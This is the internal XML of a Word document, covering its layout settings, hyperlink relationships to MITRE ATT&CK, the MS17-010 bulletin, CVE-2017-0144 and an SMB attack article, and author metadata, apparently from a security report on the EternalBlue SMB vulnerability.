          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1684744871">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="242834141">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1751196655">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="2038852882">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1793479586">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="706221514">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1951693504">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="224608911">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1998455906">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="59181390">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="2084524353">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1499152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ttack.mitre.org/techniques/T121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security-updates/securitybulletins/2017/ms17-01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ttack.mitre.org/mitigations/M102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able.com/cve/CVE-2017-0144" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cybernews.com/security/server-message-block-share-attacks-explaine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A4724-D9C8-4DD1-B2C3-5FA77888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14</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Jaiven Galusmo</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Jaiven Galusmo</cp:lastModifiedBy>
  <cp:revision>128</cp:revision>
  <cp:lastPrinted>2024-06-18T16:16:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-06-15T14:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-18T16:16:00Z</dcterms:modified>
</cp:coreProperties>
</file>